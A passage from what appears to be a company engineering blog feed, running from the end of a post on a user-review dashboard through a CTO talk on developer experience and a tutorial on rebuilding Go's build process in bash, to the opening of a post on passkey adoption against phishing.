We began the transformation by defining the specifications for the new dashboard. To ensure its efficiency, we created mock data sets for testing and refinement. The upgraded dashboard would now enable users to filter reviews by dates, ratings, categorization, and relevance tags. Realizing the importance of seamless communication, we even integrated a feature for conducting keyword searches in both English and Japanese.

Keeping data duplication in check was our next goal. Following several productive discussions, we worked in cohesion with the VoC team and QA to co-own the user reviews data. This allowed us to modify the data without creating redundancies. We also added a "Feature" column as suggested by the VoC team, to clearly highlight which application functionality the feedback pertained to. As part of this journey, we automated some processes previously handled by the VoC team, in collaboration with QA. This teamwork was a testament to Mercari’s collaborative culture.

Sneak peek of the dashboard we have in place, showing the filtering options available and some basic graphs. Below there’s much more information, insights on ratings trend, preview of the reviews, etc.

With the refined data at our disposal, we integrated it with the dashboard, refining as necessary. We were thrilled to roll out our revised weekly reports complete with interactive dashboards. The overwhelming response from Product Development Teams, all roles included, was delightful to witness. Now, our teams could effectively filter and search for keywords related to new features, shedding light on invaluable insights. Empowering our team with this data seemed like a game-changing move and we’re already excited to witness its far-reaching impact.

Improvements for the Future

As we glance into the future, we see rooms for optimization and sophistication, even though we have significantly progressed from the days of manually classifying piles of user feedback. The quest for improvement never stops!

A call to augment our efforts in communication can’t be denied. Engaging as our internal product feedback channel might be, we also acknowledge that we haven’t roped everyone into it. The key lies in promoting our dashboards and making them more accessible, so that the wealth of insights within can benefit a wider audience. Moreover, a system to ensure that the highlights from our weekly report digests reach the teams who can act upon them directly, is in the works.

In terms of opportunities, our sights are set on pouring more data into our ML model pipeline. We strongly believe there is power in volume. By automating more, we can efficiently review additional feedback and take action instead of being bogged down by manual tasks. One promising proposal is to bring back the in-app feedback form. While another involves widening our range to cover feedback from other platforms like SNS. Indeed, our current model may need some fine-tuning for these new data sources, but the potential wealth of unique insights is an exciting prospect.

Finally, an alliance with the Customer Support (CS) team feels like a natural progression. CS creates investigations for repeated inquiries about the application behavior, and we do something quite similar for repeated user reviews of our app. We believe a collaboration may pave the way for a unified process or cross-utility of our data sets to boost the quality of the solutions we’re able to offer.

Conclusion

In summary, this journey of continuously refining our approach to harnessing user feedback stands as a testament to our unwavering commitment to quality at Mercari. The narrative underscores the profound impact of collaboration between different teams within the company, as well as the potential for continuous improvement in our delivery process.

From the initial struggle with overwhelming feedback, the manual categorization of data, to the development of an automated system through our Hack Fest project, we’ve come a long way in understanding and integrating user feedback. The creation of an interactive dashboard has positively revolutionized our weekly feedback reports, enabling the different teams to efficiently use and discern data. Furthermore, the role the VoC and QA teams played in refining our use of data underscores the richness of diverse collaborations within Mercari.

However, we recognize that our journey is far from over. There remain opportunities for more efficient communication, further data integration, and exploration of fruitful alliances with more teams within the company. As we continue evolving and embracing these opportunities, our aim remains clear: to deliver ever-greater value to the users of our application.

By sharing our unique experiences, we hope to spark dialogue and collaboration beyond Mercari’s walls. The strength of user feedback should never be underestimated. When harnessed effectively, it has the power to transform services, enhance user experience, and prompt targeted enhancements that truly resonate with user needs. As such, it is an invaluable resource in our mission to "circulate all forms of value to unleash the potential in all people”.

Mercari Group CTO talks on the ideal “Global Company and Developer Experience”

Thu, 05 Oct 2023 14:00:01 GMT

※This article is a translation of the original article from Tech Team Journal.

The Developer eXperience Day 2023 was held on June 14-15, 2023, hosted by the Japan CTO Association. The final session of the second day featured a presentation by Ken Wakasa, Group CTO of Mercari, Inc. and Managing Director of Mercari India. He spoke on the theme of "Globalization of the Development Organization and Developer Experience (DX): Evolution and Challenges at Mercari".

This article presents the kind of developer experience Mercari aspires to provide, with its products expanding globally and engineers from diverse nationalities and backgrounds joining.

Vice President, Group CTO of Mercari, Inc. and Managing Director of Mercari India
Ken Wakasa

Ken received a graduate degree in informatics engineering at the University of Tokyo’s Graduate School of Engineering. He then worked on hardware-related software development (mobile phones, AV appliances) for Sun Microsystems and Sony. After joining Google and working on the development of Google Maps, he got involved with framework development as part of the Android OS dev team starting in 2010. He then worked on software development at Apple, then oversaw the development of the LINE messaging client for LINE. In August 2019, he joined Mercari as the Director of Client Engineering. In July 2021, he was appointed Mercari Japan CTO. He was appointed as the Managing Director of Mercari India (from June 2022), then moved onto becoming Group CTO in June 2023.

Why is the developer experience being discussed in the software domain?

Let me briefly introduce myself. I joined Mercari in 2019 and have been looking after the entire development organization as CTO for about 2 years now, from June 2022, I am also in charge of Mercari India, the Center of Excellence as the Managing Director.

I have been in this industry for about 25 years, developing Java platforms for cell phones, creating application platforms for consumer electronics, and developing Google Maps and the Android operating system. In this way, I have primarily been working on the platform side, and at Mercari, I manage the development of the entire product and platform, including the development of customer-facing features.

Today I will be discussing DX (Developer eXperience), but first I would like to consider why developer experience is discussed so often.

First and foremost, the developer experience itself is not the objective. The purpose is to achieve what we want to do, to accomplish our mission, and to grow our business to support that mission, and we consider the developer experience to be one of the means and prerequisites for achieving our goal.

It is also important to note that the developer experience is a major competitiveness in the hiring market. In my presentation, I will touch on the environment, tools, and frameworks for developers, as well as on addressing technical debt and investing in technology. But this time I will go beyond that and mention the developer experience.

Engineering is a broad area, ranging from hardware to software. However developer experience is actively discussed in the area of software. This is because software development is an area where ROI (return on investment) is more difficult to see. The level of complexity varies greatly from phase to phase, and software itself is an immature area of engineering, so good practices still continue to change.

It is essentially a given that the development experience should be smooth, but for this reason, the developer experience is being actively discussed in the software domain in particular. From now on, I will speak with that perspective in mind.

Mercari’s Approach to Development Environment and Technology Selection

First, we would like to introduce how Mercari has been thinking about the development environment and technology selection recently.

As a baseline, there are technology investments with relatively clear ROI (=cost effectiveness). Although some investments are large or difficult to implement, we believe that technological investments with clear ROI should be made steadily and without hesitation, as a matter of course.

On the other hand, continuous investment in technology is also required to scale the system. Here, too, ROI should be discussed and implemented in accordance with the phases of the product.

Mercari’s approach is not to be too particular about technology selection. As we will mention later, as an organization becomes more globalized and diversified, there will be situations where there is not much-shared context as a prerequisite. In such situations, leaving proprietary technologies and frameworks in place will inadvertently lower the developer experience. The basic idea is to create and adopt frameworks that are as neutral and widely accepted as possible.

I also think that getting on board with the areas, tools, and frameworks that the big players and platformers are actively investing in will also work well from the ROI perspective. Of course, there are desires to be particular and use cutting-edge technologies, but we think it is better for Mercari to adopt a balanced approach.

"Developer experience" is encompassed by the "employee experience”

At Mercari, we place great importance on the "employee experience,” so our philosophy is that the developer experience is encompassed by the employee experience. We have an organization called the Engineering Office that works to improve the developer experience, and its mission is to increase the productivity of engineers, support communication, and think about big strategies.

The Engineering Office has created an "Employee Journey Story for engineers”. This is an employee journey that begins with recruitment, onboarding, training, and ends with retirement. It sounds close to the HR-related area, but we believe that clarifying this journey and implementing a variety of measures is a prerequisite for the developer experience.

Let me make a few points about onboarding measures in particular.

Mercari places a high priority on ROI, and we are particularly conscious of consolidating the content. We are eliminating outdated content as much as possible, and at the same time, we are linking onboarding content not only to our new employees but also to existing employees and to use outside the company. The purpose of this is to clarify our thinking as Mercari within the company as well because we believe that the overall developer experience will not improve unless we are able to unify our intentions. We are also working on this from the perspective of strengthening governance.

Globalization and D&I enhance the developer experience

Some people say that Mercari is "highly globalized”. The reason why Mercari is globalizing its development organization is basically that when we went back to our mission and thought about what we needed to achieve it, we inevitably came to the conclusion that we needed to have our colleagues around the world join us.

Mercari’s group mission, which was recently disclosed to the public at our company’s 10th anniversary, is to "Circulate all forms of value to unleash the potential in all people”. The phrase "all people" mentioned here refers to people all over the world. It is simple and direct, but this is the reason why we are going global.

In order to promote globalization, we must first attract talented people from around the world to join Mercari. We need to first get them to think, "I can make use of my skills at Mercari”. I believe this is the reason why we are enhancing the developer experience by preparing the environment and systems.

To create an environment where it is easy for people to understand each other, where we can deliver our products fast, and to ease onboarding for engineers from around the world, the developer experience must be good for everyone.

In order to get people from different backgrounds to come in, we need to explain everything. However, the premise should be in low context, and it is necessary to properly explain everything in words, rather than assuming we understand each other. The same is true in the context of enhancing the developer experience. The developer experience itself has a high affinity with remote work, and as a result, it is effective not only for globalization but also as a new way of working.

Diversity & Inclusion will be a major subject as we move toward globalization since there are no shortcuts when it comes to this topic.

How do we make members from various backgrounds feel like part of the team? There are communication and language barriers, but we also need to provide training to mitigate these barriers.

We also emphasize the use of our products, and we provide training to support the use of our products for members who do not speak Japanese.

We also place great importance on information dissemination in both English and Japanese. While it is important to have documents in English, which in itself is easy to do if there is a bias toward English or Japanese in daily communication and messages from leaders, members who only speak one of the languages will feel alienated. This is why information should be presented in both English and Japanese. For this reason, we are very conscious of the fact that we must send out information in both English and Japanese at the same time, taking both sides into consideration.

Here is an introduction to Mercari India, our Center of Excellence founded in 2022. We are often asked "Why India?" and the first thing that comes to mind is the overwhelming quality and quantity of the tech talents.
Also, Mercari already has a number of talents joining from India, and we thought we can utilize the knowledge from those members. Mercari India is not an outsourcing company, but rather a structure similar to those in Japan and the U.S. Since 2023, we have also added a local site lead, so we are in the process of further strengthening our hiring and engineering capability.

In parallel, we are also expanding our organization based on strengthening the developer experience and accelerating our efforts to become a development organization that embodies D&I.

Challenges on “Autonomy and Governance" associated with Globalization

Now I would like to talk here in terms of "autonomy and governance."

There is a question that often is discussed internally; "for whom should we improve the developer experience?" However "the good developer experience" varies from team to team and from person to person. The more D&I progresses, the more discrepancies arise, so we have adopted a policy of avoiding a developer experience that is optimized only for a specific team or person, and instead considering how to improve the developer experience as a whole.

For this reason, it is important to ensure accountability when implementing measures to improve the developer experience. It is also important to carefully gather feedback from the field and to ensure that the developer experience is not a self-indulgent one.

Considering the autonomy and governance associated with globalization, globalization tends to expand diversity, while organizational expansion also tends to increase autonomy to scale individual businesses. The combination of both of these factors leads to local optimization, and the challenge is that governance and overall optimization are becoming increasingly difficult to achieve.

Investing in Developer Experience with "Business Goals and ROI" in Mind

I would like to delve deeper into the developer experience.

We believe that engineering is not only about writing code or developing code and that engineering is about solving problems. To achieve this, we focus on "what we want" rather than "what to do”. We believe this is the true developer experience. First, we need to understand the goal. In most cases, the goal is to achieve the business objective or mission. We believe that thinking about what to do and what not to do in order to achieve what we want, and then carrying it out, is the true meaning of a "good developer experience".

From this point on, we are talking about communication with management. In order to improve the developer experience, it is of course necessary to make investments for this purpose. In this way, how to fulfill accountability to management will also be a major topic.

As we discussed at the beginning, software is hard to see, so the world seen by the management and the developers are different. Business goals and developer experience are two things that need mutual understanding. For our part, we are conscious of the need for two-way communication between the field and management on how investment in the developer experience will contribute to the achievement of our business goals.

On the other hand, the investment in improving the developer experience can become very large. While the cost can become infinitely high in improving the developer experience alone, the ROI cannot be ignored.

We do not want to aim for "Gorgeous DX" or a “wealthy development environment”. Improving the developer experience is only a means to an end, and it is important to think carefully about ROI as a way to communicate with management.

As an example, cloud natives have the advantage of a better developer experience, but as we all know, the costs paid to cloud vendors can suddenly balloon or be unintentionally charged at a high rate. As a countermeasure, Mercari has recently launched a "FinOps" initiative. This is an initiative to visualize the costs of each business and measure, and make highly granular investment decisions by looking at each cost.

From Developer Experience to "Value Creating Experience”

To summarize the discussion so far, we have very broadly discussed the developer experience at Mercari. The baseline is smooth development and doing what needs to be done right. We start by understanding the purpose of improving the developer experience, and then we keep in mind implementing measures that are tied to the purpose.

Engineers are getting paid better and better, and companies are competing with each other to hire them. With this situation expected to continue in the future, engineers are no longer "workers" who make things when you ask them to, but rather "Smart Creatives" who solve business problems and create value. The way management perceives engineers is also changing in this sense.

We also discussed the employee experience that underpins the developer experience. In particular, I explained our emphasis on onboarding, and this kind of improvement in the developer experience is very compatible with globalization and can be considered a necessary condition. In light of this, a developer experience that is not self-indulgent is being required, and we are working to ensure governance by fulfilling accountability and promoting D&I-conscious initiatives.

We believe that the developer experience is ultimately "the experience of creating value through engineering excellence.” The foundation of a good developer experience is the ability to link our engineering to business and growth, and to take pride in what we have accomplished. We believe that by starting with a good developer experience, we can eventually lead to the "Value Creating Experience" by solving larger problems and creating value.

How to Build a Go Program without Using go build

Tue, 03 Oct 2023 08:00:18 GMT

Is it possible to build a Go program without using go build?
Indeed, it is!

This article explains how the official go build works and how to reproduce it on your own.

One day this question came to my mind, and I decided to write my own go build bash script. After 2 weeks, I reached the stage where I can build the kubectl binary, a Kubernetes client program that depends on more than 800 packages.

You can check out the script here:
https://github.com/DQNEO/go-build-bash

It’s able to build kubectl , uber-go/zap, spf13/cobra, golang/protobuf and other renowned modules. Additionally, it supports some level of cross-compilation (4 patterns, limited to amd64 CPU)

Mac → Mac
Mac → Linux
Linux → Mac
Linux → Linux

I also succeeded in building my own Go compiler (https://github.com/DQNEO/babygo) and assembler (https://github.com/DQNEO/goas) using this go-build-bash. Seeing it function was incredibly thrilling.

Actually its build speed is slow (a full build of kubectl is 4 times slower than the official Go). However, as I aimed to keep the code as simple as possible while writing in bash, even people who are unfamiliar with Go can comprehend it. I also ensured that the build log is highly readable.

Here is the log of the hello world build. It gives a clear view of what happens during the build process:
https://gist.github.com/DQNEO/7b0710b08baa4eb2fc6fb8bde8c432e1

By this experience I got a basic understanding of how the official go build works, and am going to explain it in the following chapters.
(I try to make it as accurately as possible to the best of my understanding, However, it may not be completely accurate. If you see any inconsistencies, please message me at https://twitter.com/DQNEO )

What does the official `go build` do?

The overall process of go build can be broken down as follows:

It inspects the source files of the specified package for import declarations, followed by a recursive examination of the source files for the packages that need to be imported. As a result, a dependency graph/tree is formed.
Packages are sorted by the number of packages it is depended by, from least to most depended.e.g., runtime -> reflect -> fmt -> main )
It compiles the Go code of a package and places it into an archive file.
If a package includes assembly files, these are also assembled and added to the archive file.
Finally, all of the archive files for each package are linked together to create a binary executable file

On taking a closer look at this process, you will find some key points:

The fundamental concept is ""Work on a per-package basis".
During the compilation of a package, only the directly imported packages are referenced.
Cross-compilation essentially involves the selection of source files that match target architecture.
Multiple files within a package are simultaneously processed to the compiler (you can observe the compiler parsing multiple files at once. (https://cs.opensource.google/go/go/+/refs/tags/go1.20.5:src/cmd/compile/internal/noder/noder.go;l=43-60 )

These characteristics facilitate parallelization (between and within packages) and simplify cache management, thereby reducing build times.
Given that the development of the Go language was initially intended to reduce build times, it’s natural for such innovations to be incorporated within its syntax or language specification. (refer to the Go language announcement in 2009 https://youtu.be/rKnDgT73v8s?t=839 )
One instance of this is that the compiler will report an error if imported packages are not used, which helps to reduce the build speed. Another example is the requirement to include import declarations immediately after the package declaration, which simplifies the task for the builder, as then there’s no need to parse the entire file to craft the dependency graph.

Interestingly, the unsafe package doesn’t show up in the build log. One would expect it to appear on the build log — after all, it should be just another package. In reality, reflect does not appear in the build logs. because reflect is what is known as a "pseudo-package". It is actually part of the compiler features. https://cs.opensource.google/go/go/+/refs/tags/go1.20.5:src/cmd/compile/internal/gc/main.go;l=90-91 )

By following the building operations below, you can see these facts by yourself.

Building `Hello world` and Tracking the process

Let’s actually use the official go build to monitor the process.

First, create the necessary files. ( main.go and go.mod )

$ cat > main.go <<EOF
package main
import "fmt"
func main() {fmt.Println("hello world")}
EOF
$ go mod init example.com/hello

Ensure that it can be built and run.

$ go build
$ ./hello
hello world

Output execution log

You can view the logs by adding the -x option to go build:

$ go build -x
WORK=/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build2336838040

Unfortunately, there is only one line in the log.
This is because the cache is in effect. Since this is the second build of hello, it utilizes the result of the first build.

The -a option disables all caching, and all packages, including standard libraries, are built from source:

$ go build -x -a
WORK=/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build4274470276
mkdir -p $WORK/b005/
mkdir -p $WORK/b012/
cat >/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build4274470276/b005/importcfg << 'EOF' # internal
# import config
EOF
cat >/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build4274470276/b012/importcfg << 'EOF' # internal
# import config
EOF
cd /tmp/birudo
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/compile -o $WORK/b005/_pkg_.a -trimpath "$WORK/b005=>" -p internal/goarch -std -+ -complete -buildid NeMeTvvWBf8p5uHSGfak/NeMeTvvWBf8p5uHSGfak -goversion go1.20.4 -c=4 -nolocalimports -importcfg $WORK/b005/importcfg -pack /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch_amd64.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/zgoarch_amd64.go
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/compile -o $WORK/b012/_pkg_.a -trimpath "$WORK/b012=>" -p internal/coverage/rtcov -std -+ -complete -buildid mI6xNmP8pxnOcrWlN_qn/mI6xNmP8pxnOcrWlN_qn -goversion go1.20.4 -c=4 -nolocalimports -importcfg $WORK/b012/importcfg -pack /usr/local/Cellar/go/1.20.4/libexec/src/internal/coverage/rtcov/rtcov.go
mkdir -p $WORK/b014/

…

When executed, it outputs a long log. It is messy and somewhat unreadable. This is because multiple package builds are running in parallel.

The -p 1 option restricts the number of parallel processes to 1.

$ go build -x -a -p 1
WORK=/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build3299870493
mkdir -p $WORK/b005/
cat >/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build3299870493/b005/importcfg << 'EOF' # internal
# import config
EOF
cd /tmp/birudo
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/compile -o $WORK/b005/_pkg_.a -trimpath "$WORK/b005=>" -p internal/goarch -std -+ -complete -buildid NeMeTvvWBf8p5uHSGfak/NeMeTvvWBf8p5uHSGfak -goversion go1.20.4 -c=8 -nolocalimports -importcfg $WORK/b005/importcfg -pack /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch_amd64.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/zgoarch_amd64.go
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/buildid -w $WORK/b005/_pkg_.a # internal
cp $WORK/b005/_pkg_.a /Users/DQNEO/Library/Caches/go-build/79/799f3b0680ae6929fbd8bc4eea9aa74868623c9e216293baf43e5e1a3c85aa84-d # internal
mkdir -p $WORK/b006/
cat >/var/folders/bq/2mhmkrcn59dd9t7pq5_6hbw80000gp/T/go-build3299870493/b006/importcfg << 'EOF' # internal
# import config

The build flow now appears as a single stream and is much easier to follow.
Interestingly, the log is an executable shell script. Let’s save the log to a file and run it as a bash script.

$ go build -x -a -p 1 2> buildx.sh
$ bash < buildx.sh
$ ./hello
hello world

It runs perfectly.
Here’s an additional trick: If you pass the -n option instead of -x, the build will not execute and it only generates the log, which is super fast (known as a dry-run). The log will also come with comments, making it easier to read. This is helpful when you want to investigate the build process.
(Note that -n automatically applies -p 1, so -p is not necessary in this case.)

$ go build -n -a

#
# internal/goarch
#

mkdir -p $WORK/b005/
cat >$WORK/b005/importcfg << 'EOF' # internal
# import config
EOF
cd /tmp/birudo
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/compile -o $WORK/b005/_pkg_.a -trimpath "$WORK/b005=>" -p internal/goarch -std -+ -complete -buildid NeMeTvvWBf8p5uHSGfak/NeMeTvvWBf8p5uHSGfak -goversion go1.20.4 -c=8 -nolocalimports -importcfg $WORK/b005/importcfg -pack /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch_amd64.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/zgoarch_amd64.go
/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/buildid -w $WORK/b005/_pkg_.a # internal

…

Here is the full log

However, there is one caveat: the -n logs are not executable in a shell as they appear. Some modifications are required to make it executable, namely:

Set the variable $WORK.
Remove 'EOF' quotes.

$ go build -n -a 2> buildn.sh
$ cat buildn.sh | sed -e "s/'EOF'.*$/EOF/g" | WORK=/tmp/go-build bash

Now it’s executable.

I recommend refactoring this buildn.sh script (e.g., combining iterations into for statements) for better understanding. Actually, my go-build-bash, introduced at the beginning of this article, is the ultimate result of such refactoring.

Inference of hidden logic from execution logs

Unfortunately, it is not possible to understand the build only by reading the log. There is some hidden logic that does not show up in the log.

Where to find the source code for the package
How to select files to compile
How to determine compilation options
How to determine the order of packages to build
How to embed files when embed tags are present

For example, we can see the internal/goarch package being compiled at the start of the hello build log:

/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/compile -o $WORK/b005/_pkg_.a -trimpath "$WORK/b005=>" -p internal/goarch -std -+ -complete -buildid NeMeTvvWBf8p5uHSGfak/NeMeTvvWBf8p5uHSGfak -goversion go1.20.4 -c=8 -nolocalimports -importcfg $WORK/b005/importcfg -pack /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/goarch_amd64.go /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch/zgoarch_amd64.go

How does the build know internal/goarch should be compiled first?
How does it know the source files are in /usr/local/Cellar/go/1.20.4/libexec/src?

Regarding the list of files sent to compile, only three files goarch.go goarch_amd64.go zgoarch_amd64.go are visible in the log. However, a look at the source directory in internal/goarch reveals 39 .go files:

$ ls /usr/local/Cellar/go/1.20.4/libexec/src/internal/goarch
gengoarch.go     goarch_arm.go      goarch_mips64.go    goarch_ppc64le.go  zgoarch_386.go    zgoarch_arm64be.go  zgoarch_mips64.go       zgoarch_mipsle.go   zgoarch_riscv.go    zgoarch_sparc.go
goarch.go        goarch_arm64.go    goarch_mips64le.go  goarch_riscv64.go  zgoarch_amd64.go  zgoarch_armbe.go    zgoarch_mips64le.go     zgoarch_ppc.go      zgoarch_riscv64.go  zgoarch_sparc64.go
goarch_386.go    goarch_loong64.go  goarch_mipsle.go    goarch_s390x.go    zgoarch_arm.go    zgoarch_loong64.go  zgoarch_mips64p32.go    zgoarch_ppc64.go    zgoarch_s390.go     zgoarch_wasm.go
goarch_amd64.go  goarch_mips.go     goarch_ppc64.go     goarch_wasm.go     zgoarch_arm64.go  zgoarch_mips.go     zgoarch_mips64p32le.go  zgoarch_ppc64le.go  zgoarch_s390x.go

What is the logic behind selecting 3 out of 39?

Some packages have the compile option -complete or -+, while others don’t. What is the criteria for this?

IIf a package has assembly files, the process changes significantly. if you build a larger package , like kubectl, you’ll notice special handling for embed. There are many hidden mechanics like this.

If you intend to create your own builder, you’ll need to reproduce these processes.
As a reverse engineering enthusiast, I guessed what the process is by looking at the logs to create my own go build.

Reproduce the build process details

Finding the source directory of the package

Generally,

Standard libraries from $(go env GOROOT)/src
Packages in your own module are from your module’s root directory (where go.mod is located)
Otherwise, from the vendor directory

Determining the order of packages to build?

The dependency graph for the build is obtained by following the import declarations in the source code recursively. We can use an algorithm called Topological sort to establish the build order of the packages.

A very rough description of this procedure can be described as:

Cut off terminal nodes(the "leaf" elements) of the tree
Then some of the remaining branches become new terminal nodes
Cut them off
Repeat this process until the tree is empty

In my build tool, you can view the state before and after the sort:
(https://gist.github.com/DQNEO/7b0710b08baa4eb2fc6fb8bde8c432e1#file-build_hello-log-L681-L769 )

Selecting files to compile

The logic for selecting files to be compiled from the package source directory is as follows:

Exclude the *_test.go files
For files with _{OS}. * , _{CPU}. * , _{OS}_{CPU}. * suffixes, exclude those that do not match the build target ($GOOS, $GOARCH)
For the remaining files, parse the build tags (e.g. //go:build windows || (linux && amd64)) and exclude those that do not match the result of logical operations

The remaining files that are not excluded are passed to the compiler.

For example, when it builds math package for a machine with Intel CPU, "exp_amd64.go" is selected due to the filename suffix rule, and "exp_asm.go" is selected due to its built tag ("amd64 || arm64 || s390x") to generate machine-specific binary code

It is wonderful that such a simple mechanism is able to achieve cross-compilation.

Luckily for me, logical operators build tags (! , &&,||, etc.) can be interpreted as is in bash, so porting was easy.

Determining compilation options

Some package attributes lead to different compile options.

-std compiling standard library
-complete compiling complete package (no C or assembly)
-symabis read symbol ABIs from file
-embedcfg read go:embed configuration from file

-std must be added when compiling standard library packages.
-complete can be added when you want to reject function declarations without body. The go build style is to add it usually, and remove it only for special cases (assembly files and a few packages with functions without body). Note that the language specification allows function declarations without body.
-symabis must be added when the package contains assembly files (see below).
-embedcfg is a configuration file that realizes go:embed (see below).

Handling assembly files

If the package directory contains assembly files, following operations are needed:

Create `symabis` file

It is used to tell the compiler which assembly function conforms to which ABI (Application Binary Interface).

You do not need to be aware of the contents of the file, as they are automatically generated by asm -gensymabis.

/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/asm -p internal/cpu -trimpath "$WORK/b011=>" -I $WORK/b011/ -I /usr/local/Cellar/go/1.20.4/libexec/pkg/include -D GOOS_darwin -D GOARCH_amd64 -D GOAMD64_v1 -gensymabis -o $WORK/b011/symabis ./cpu.s ./cpu_x86.s

Assemble

This is the assembly process in a narrow sense. It converts the assembly source to an object file. There is a one-to-one correspondence between input and output files.

/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/asm -p internal/cpu -trimpath "$WORK/b011=>" -I $WORK/b011/ -I /usr/local/Cellar/go/1.20.4/libexec/pkg/include -D GOOS_darwin -D GOARCH_amd64 -D GOAMD64_v1 -o $WORK/b011/cpu.o ./cpu.s

Add object file to archive

You can use the pack r command to append object files to the archive.

/usr/local/Cellar/go/1.20.4/libexec/pkg/tool/darwin_amd64/pack r $WORK/b012/_pkg_.a $WORK/b012/cpu.o $WORK/b012/cpu_x86.o # internal

If you are curious about the contents of the archive file (pkg.a), you can see a list of object files by pack t.

$ go tool pack t _pkg_.a
__.PKGDEF
_go_.o
cpu.o
cpu_x86.o

Embedding files when embed tags are present

If go:embed tag is present in the source code, the filesystem must be explored to make a mapping information into JSON, which is passed to the compiler. go:embed actually has multiple modes of operations, including embedding a single file, a directory, and globbing by matching file names.
I will not go into detail as it would be long, so let me introduce how the single file mode works.

//go:embed p256_asm_table.bin
var p256PrecomputedEmbed string

The absolute path of the specified file is resolved and written in JSON.

{
    "Patterns": {
        "p256_asm_table.bin": [
            "p256_asm_table.bin"
        ]
    }, }
    "Files": {
        "p256_asm_table.bin": "/usr/local/Cellar/go/1.20.4/libexec/src/crypto/internal/nistec/p256_asm_table.bin"
    }
}

If you are curious about other modes, please take a look at my bash implementation.

Save this JSON in a file, pass it to the compiler with -embedcfg option, and it incorporates the JSON into the object file.

compile -embedcfg $WORK/b050/embedcfg ...

This is how go:embed works at the builder’s layer. Actual work of embedding files is done by the compiler.

After applying all these logic to find the source directory, select files, determine compiling options, sorting packages and embedding files, you can finally get a binary that works.

Conclusion

Now you can build large programs such as kubectl.
The details that were not mentioned in this article can be found in the build log and go-build-bash code. You can also read the official go build source. (https://github.com/golang/go/blob/e827d41c0a2ea392c117a790cdfed0022e419424/src/cmd/go/internal/work/build.go#L447 )

You can build your program by yourself !

(This article is translated from my Japanese version: https://zenn.dev/dqneo/articles/ce9459676a3303 )

Mercari’s passkey adoption

Thu, 10 Aug 2023 17:28:06 GMT

Mercari, Inc. offers C2C marketplace services as well as online and mobile payment solutions. Users can sell items on the marketplace, and make purchases in physical stores.

Mercari is actively working on preventing phishing attacks. This is the driving force behind the adoption of passkey authentication. To enhance phishing resistance, several factors need to be considered, leading to the introduction of a few requirements:

1) SMS OTP is required to register the first passkey.
2) Passkey authentication is required to register the second passkey.
3) The authentication should be via hybrid transport.

This article will discuss the motivations behind this decision, the challenges faced, and how they were addressed.

Motivation

There were primarily two motivations for adopting passkey authentication. The first was to mitigate real-time phishing attacks. When several phishing sites targeted users of Mercari in 2021 Mercari adopted SMS OTP (One-Time Password) as an additional form of authentication as a countermeasure of these attacks. This strategy proved effective as it required attackers to obtain the SMS OTP multiple times, which is difficult to achieve by a real-time phishing site. However, repeatedly sending SMS OTPs was both expensive and not user-friendly, and it couldn’t entirely prevent account takeovers. Transitioning to passkey authentication allowed us to reduce the cost associated with SMS OTPs while also improving the user experience.

The second motivation stemmed from the requirement for a new service: Mercoin, which is a platform for buying and selling Bitcoin with the user’s available balance in Mercari. Given that this service deals with cryptocurrency assets, it was clear that the service required stronger security measures than ordinary services. We already knew that our existing authentication methods, using passwords and SMS OTPs were not sufficient in protecting our services and users from real-time phishing attacks. By implementing passkey authentication, we were able to better protect our features and users from real-time phishing attacks.

Mercari’s Current Authentication Situation

Mercari supports various authentication methods including passwords, SMS OTPs, social logins, and passkeys. These authentication methods are used for specific operations such as signing into a Mercari account, initiating critical operations such as transfering money out of Mercari, or accessing Mercoin. Each operation requires a different combination of authentication methods. For instance, logging into a Mercari account requires two-factor authentication, such as a password coupled with an SMS OTP, or a social login plus an SMS OTP.

Using Mercoin requires passkey authentication, both for accessing Mercoin’s main features and initiating critical operations. This cannot be substituted by any other authentication methods because we want to make these Mercoin features phishing-resistant.

Recently, passkey authentication has also become available for Mercari’s critical operations, such as changing passwords or transferring money out of Mercari. It serves as an additional layer of authentication, instead of relying solely on SMS OTP.

As of this writing, over 900,000 Mercari accounts have registered passkeys. The success rate and median of authentication time are as follows. The higher the success rate of authentication and the shorter the authentication time, the better the user experience is. This is especially important when requiring users to use extra authentication methods, as requiring this additional action is an obstacle for the users who want to accomplish something else using the app. In these situations the success rate and authentication time has a significant impact on the user.

	Success rate	Authentication time
SMS OTP	67.7%	17 s
Passkey	82.5%	4.4 s

Making a phishing-resistant environment

The implementations of the passkey in Mercari and in Mercoin serve different purposes. In Mercari’s critical operations, the purpose is to enhance the user experience, while in Mercoin, it aims to improve security, in other words, creating a phishing-resistant environment. Achieving this involves multiple challenges which include requiring authentication with a passkey, requiring the strongest authentication for passkey management, and implementing a proper proximity boundary.

Require the strongest authentication for passkey management

